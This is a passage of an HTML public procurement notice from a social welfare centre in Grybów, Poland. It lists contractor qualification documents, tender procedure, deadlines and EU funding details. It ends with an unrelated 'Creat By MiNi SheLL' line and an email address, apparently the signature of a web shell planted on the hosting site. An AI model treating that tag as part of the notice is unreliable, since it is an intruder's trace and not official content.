<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> WWW.wrotamalopolski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej
ul. Jakubowskiego 33
33-330 Grybów
pokój nr 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.10.2013 godzina 09:00, miejsce: Gminny Ośrodek Pomocy Społecznej
ul. Jakubowskiego 33
33-330 Grybów
pokój nr 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com